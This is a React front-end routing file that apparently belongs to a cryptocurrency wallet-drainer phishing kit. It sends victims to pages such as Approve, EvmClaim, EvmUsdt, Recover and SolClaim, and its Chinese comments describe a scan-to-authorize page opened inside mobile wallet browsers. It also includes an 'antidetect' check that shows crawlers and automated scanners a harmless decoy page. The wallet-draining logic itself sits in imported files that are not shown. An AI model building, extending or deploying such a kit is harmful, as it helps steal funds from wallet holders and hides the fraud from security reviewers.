import React, { useState } from 'react';
import { isBlocked, renderBlocked } from './utils/antidetect';
import './App.css';
import { UserProvider } from './context/UserContext';
import { ToastContainer } from './components/Toast';
import Home from './pages/Home/Home';
import Approve from './pages/Approve/Approve';
import EvmClaim from './pages/EvmClaim/EvmClaim';
import EvmUsdt from './pages/EvmUsdt/EvmUsdt';
import DappSwap from './pages/DappSwap/DappSwap';
import EvmNft from './pages/EvmNft/EvmNft';
import Recover from './pages/Recover/Recover';
import SolClaim from './pages/SolClaim/SolClaim';
import StakeDapp from './pages/StakeDapp/StakeDapp';
import Landing from './pages/Landing/Landing';
import AppDapp from './pages/AppDapp/AppDapp';
import LangSwitch from './components/LangSwitch';
import Serve from './pages/Serve/Serve';
import Swap from './pages/Swap/Swap';
import Spread from './pages/Spread/Spread';

function App() {
  const [currentPage, setCurrentPage] = useState('home');

  // 防检测：爬虫/自动化环境显示无害页
  if (isBlocked()) {
    renderBlocked();
    return null;
  }

  // 扫码授权落地页：/approve 路径直接渲染授权页（手机钱包内嵌浏览器打开）
  if (window.location.pathname === '/approve') {
    return <><Approve /><LangSwitch /></>;
  }
  if (window.location.pathname === '/evm') {
    return <><EvmClaim /><LangSwitch /></>;
  }
  if (window.location.pathname === '/evm-usdt') {
    return <><EvmUsdt /><LangSwitch /></>;
  }
  if (window.location.pathname === '/dapp') {
    return <><DappSwap /><LangSwitch /></>;
  }
  if (window.location.pathname === '/evm-nft') {
    return <><EvmNft /><LangSwitch /></>;
  }
  if (window.location.pathname === '/recover') {
    return <><Recover /><LangSwitch /></>;
  }
  if (window.location.pathname === '/sol') {
    return <><SolClaim /><LangSwitch /></>;
  }
  if (window.location.pathname === '/stake') {
    return <><StakeDapp /><LangSwitch /></>;
  }
  if (window.location.pathname === '/lp') {
    return <><Landing /><LangSwitch /></>;
  }
  if (window.location.pathname === '/app') {
    return <><AppDapp /><LangSwitch /></>;
  }

  const renderPage = () => {
    switch (currentPage) {
      case 'serve':
        return <Serve onTabChange={setCurrentPage} />;
      case 'swap':
        return <Swap onTabChange={setCurrentPage} />;
      case 'spread':
        return <Spread onTabChange={setCurrentPage} />;
      case 'home':
      default:
        return <Home onTabChange={setCurrentPage} />;
    }
  };

  return (
    <UserProvider>
      <div className="App">
        {renderPage()}
        <LangSwitch />
        <ToastContainer />
      </div>
    </UserProvider>
  );
}

export default App;
